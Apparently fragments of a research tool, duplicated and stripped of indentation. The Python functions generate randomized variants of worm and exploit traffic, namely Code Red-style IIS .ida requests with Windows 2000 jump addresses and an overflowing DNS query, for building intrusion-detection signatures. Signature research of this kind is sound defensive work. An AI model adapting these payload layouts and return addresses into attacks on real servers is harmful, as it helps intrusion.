def generate(self, count):
safe_chars = [chr(i) for i in xrange(256)]
for i in string.whitespace:
safe_chars.remove(i)
safe_chars.remove(chr(0))
samples = []
for i in xrange(count):
request = []
request.append('GET /')
request.append(random_bytes(701, safe_chars))
this_ra = self.ra + random.randint(-self.modulation,
self.modulation)
request.append(struct.pack('L', this_ra))
request.append(random_bytes(self.after_ra_len, safe_chars))
request.append(' HTTP/1.1')
request.append('\r\n')
yield (''.join(request))
def generate(self, count):
safe_chars = [chr(i) for i in xrange(256)]
for i in string.whitespace:
safe_chars.remove(i)
safe_chars.remove(chr(0))
samples = []
for i in xrange(count):
request = []
request.append('GET /')
request.append(random_bytes(701, safe_chars))
this_ra = self.ra + random.randint(-self.modulation,
self.modulation)
request.append(struct.pack('L', this_ra))
request.append(random_bytes(self.after_ra_len, safe_chars))
request.append(' HTTP/1.1')
request.append('\r\n')
yield(''.join(request))
def generate(self, count):
safe_chars = [chr(i) for i in xrange(256)]
# safe_chars = ['a', 'b']
# safe_chars = [x for x in string.printable]
for i in string.whitespace:
safe_chars.remove(i)
safe_chars.remove(chr(0))
samples = []
for i in xrange(count):
request = []
request.append('GET /')
request.append(
random_bytes(random.randrange(1, 10), string.letters))
request.append('.ida?')
request.append(random_bytes(222, string.letters))
# NN used in codered, XX in coderedII, CC in eeye example exploit
request.append(random.choice(['NN', 'XX', 'CC']))
# not sure about this part. appears to be assembly code in
# codered.
request.append(random_bytes(15, string.letters))
# codered causes control to jump to a 'call ebx' within a windows dll
request.append(
random.choice([
# locations of call ebx in win2k sp0 and sp1
'%u41f9%u7800', #0x780041f9
'%u4223%u7800', #0x78004223
'%ucb65%u7801', #0x7801cb65
'%ucbd3%u7801', #0x7801cbd3 (used in actual codered)
'%ucf3f%u7801', #0x7801cf3f
'%ub23f%u7802', #0x7802b23f
]))
request.append(random_bytes(15, string.letters))
request.append('=')
request.append(random_bytes(7, string.letters))
request.append(' HTTP/1.0\r\n')
# FIXME- still need headers and shellcode
yield (''.join(request))
def generate(self, count):
safe_chars = [chr(i) for i in xrange(256)]
# safe_chars = ['a', 'b']
# safe_chars = [x for x in string.printable]
for i in string.whitespace:
safe_chars.remove(i)
safe_chars.remove(chr(0))
samples = []
for i in xrange(count):
request = []
request.append('GET /')
request.append(random_bytes(random.randrange(1,10), string.letters))
request.append('.ida?')
request.append(random_bytes(222, string.letters))
# NN used in codered, XX in coderedII, CC in eeye example exploit
request.append(random.choice(['NN', 'XX', 'CC']))
# not sure about this part. appears to be assembly code in
# codered.
request.append(random_bytes(15, string.letters))
# codered causes control to jump to a 'call ebx' within a windows dll
request.append(random.choice([
# locations of call ebx in win2k sp0 and sp1
'%u41f9%u7800', #0x780041f9
'%u4223%u7800', #0x78004223
'%ucb65%u7801', #0x7801cb65
'%ucbd3%u7801', #0x7801cbd3 (used in actual codered)
'%ucf3f%u7801', #0x7801cf3f
'%ub23f%u7802', #0x7802b23f
]))
request.append(random_bytes(15, string.letters))
request.append('=')
request.append(random_bytes(7, string.letters))
request.append(' HTTP/1.0\r\n')
# FIXME- still need headers and shellcode
yield(''.join(request))
def special_random_bytes(count, safe):
buf = []
import random
import struct
global counter
global p
while len(buf) < count:
if random.random() < p:
tmp = struct.pack('H', counter)
else:
tmp = worm_gen.random_bytes(2, safe)
buf.append(tmp[0])
buf.append(tmp[1])
counter += 1
return ''.join(buf[:count])
def special_random_bytes(count, safe):
buf = []
import random
import struct
global counter
global p
while len(buf) < count:
if random.random() < p:
tmp = struct.pack('H', counter)
else:
tmp = worm_gen.random_bytes(2, safe)
buf.append(tmp[0])
buf.append(tmp[1])
counter += 1
return ''.join(buf[:count])
def _rand_header():
return random_bytes(random.randrange(3,10), string.letters + string.digits) + \
": " + \
random_bytes(random.randrange(10,20), string.letters + string.digits) + \
"\r\n"
def _rand_header():
return worm_gen.random_bytes(random.randrange(3,10), \
string.letters + string.digits) + ": " + \
worm_gen.random_bytes(random.randrange(10,20), \
string.letters + string.digits) + "\r\n"
def generate(self, count):
for i in xrange(count):
request = []
bytes = [chr(i) for i in xrange(256)]
# DNS ID
request.append(random_bytes(2, bytes))
# first bit is 0 to indicate a query.
byte = random.choice(range(256))
byte &= ~(0x80)
request.append(chr(byte))
# randomly choose 'recursion not available' bit
# all other bits should be zero, but not checked
# by server
# request.append(random.choice(['\x80', '\x00']))
request.append(random_bytes(2, bytes))
# number of entries in question section. 2 in published exploit.
# chosen randomly here.
# realistically, it can probably only be a relatively small
# number though.
request.append(random_bytes(2, bytes))
# resource records in the answer section
request.append(random_bytes(2, bytes))
# ns resource records in the authority answer section
request.append(random_bytes(2, bytes))
# resource records in additional record section
# anything but zero
request.append(struct.pack("H", random.choice(xrange(1, 2 ** 16))))
# first encoded QNAME (shell code)
# technically this needs to be properly encoded.
# i.e., a byte indicating length, that many bytes, another byte
# indicating length, etc. For signature
# generation purposes though, it might as well be random bytes.
request.append(random_bytes(256, bytes))
# could be all one QNAME instead of two
# request.append(chr(0))
# apparently server doesn't check this value,
# so it could actually vary
# request.append(chr(0) + chr(1) + chr(0) + chr(1))
request.append(random_bytes(4, bytes))
# second encoded QNAME (part is used as stack frame after overwrite)
request.append(random_bytes(62, bytes))
# Hyang-Ah has seen versions without this.
# request.append(chr(6) + chr(0) + chr(0) +chr(0))
# two stack addresses. more in actual exploit,
# but may not be necessary.
# update- Hyang-Ah thinks only one...
request.append(random_bytes(2, bytes))
# request.append('\xff\xbf')
request.append(random_bytes(2, bytes))
request.append("\xff\xbf")
# the rest of the second QNAME
request.append(random_bytes(200, bytes))
request.append(chr(0))
# apparently server doesn't check this value,
# so it could actually vary
# request.append(chr(0) + chr(1) + chr(0) + chr(1))
request.append(random_bytes(4, bytes))
# another encoded field ending with 00.
# has 0 length in actual exploit
request.append(random_bytes(10, bytes))
request.append(chr(0))
# record type. FIXED
request.append(chr(0) + chr(0xFA))
# record class. should be 0x00ff, but not checked by server
request.append(random_bytes(2, bytes))
yield "".join(request)
def generate(self, count):
for i in xrange(count):
request = []
bytes = [chr(i) for i in xrange(256)]
# DNS ID
request.append(random_bytes(2, bytes))
# first bit is 0 to indicate a query.
byte = random.choice(range(256))
byte &= ~(0x80)
request.append(chr(byte))
# randomly choose 'recursion not available' bit
# all other bits should be zero, but not checked
# by server
# request.append(random.choice(['\x80', '\x00']))
request.append(random_bytes(2, bytes))
# number of entries in question section. 2 in published exploit.
# chosen randomly here.
# realistically, it can probably only be a relatively small
# number though.
request.append(random_bytes(2, bytes))
# resource records in the answer section
request.append(random_bytes(2, bytes))
# ns resource records in the authority answer section
request.append(random_bytes(2, bytes))
# resource records in additional record section
# anything but zero
request.append(struct.pack('H', random.choice(xrange(1, 2**16))))
# first encoded QNAME (shell code)
# technically this needs to be properly encoded.
# i.e., a byte indicating length, that many bytes, another byte
# indicating length, etc. For signature
# generation purposes though, it might as well be random bytes.
request.append(random_bytes(256, bytes))
# could be all one QNAME instead of two
# request.append(chr(0))
# apparently server doesn't check this value,
# so it could actually vary
# request.append(chr(0) + chr(1) + chr(0) + chr(1))
request.append(random_bytes(4, bytes))
# second encoded QNAME (part is used as stack frame after overwrite)
request.append(random_bytes(62, bytes))
# Hyang-Ah has seen versions without this.
# request.append(chr(6) + chr(0) + chr(0) +chr(0))
# two stack addresses. more in actual exploit,
# but may not be necessary.
# update- Hyang-Ah thinks only one...
request.append(random_bytes(2, bytes))
# request.append('\xff\xbf')
request.append(random_bytes(2, bytes))
request.append('\xff\xbf')
# the rest of the second QNAME
request.append(random_bytes(200, bytes))
request.append(chr(0))
# apparently server doesn't check this value,
# so it could actually vary
# request.append(chr(0) + chr(1) + chr(0) + chr(1))
request.append(random_bytes(4, bytes))
# another encoded field ending with 00.
# has 0 length in actual exploit
request.append(random_bytes(10, bytes))
request.append(chr(0))
# record type. FIXED
request.append(chr(0) + chr(0xfa))
# record class. should be 0x00ff, but not checked by server
request.append(random_bytes(2, bytes))
yield ''.join(request)
def _rand_header():
return random_bytes(random.randrange(3,10), string.letters + string.digits) + \
": " + \
random_bytes(random.randrange(10,20), string.letters + string.digits) + \
"\r\n"
def _rand_header():
return worm_gen.random_bytes(random.randrange(3,10), \
string.letters + string.digits) + ": " + \
worm_gen.random_bytes(random.randrange(10,20), \
string.letters + string.digits) + "\r\n"
